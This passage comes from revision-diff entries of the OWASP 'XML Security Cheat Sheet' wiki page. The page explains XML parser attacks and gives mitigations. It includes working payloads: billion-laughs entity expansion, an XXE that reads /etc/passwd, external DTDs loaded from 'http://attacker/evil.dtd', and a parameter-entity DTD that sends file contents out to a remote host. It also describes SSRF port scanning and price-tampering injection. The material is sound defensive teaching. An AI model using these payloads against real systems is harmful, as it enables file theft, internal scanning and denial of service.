 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224422</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224422"/>
				<updated>2016-12-21T20:08:37Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
 &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
 &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
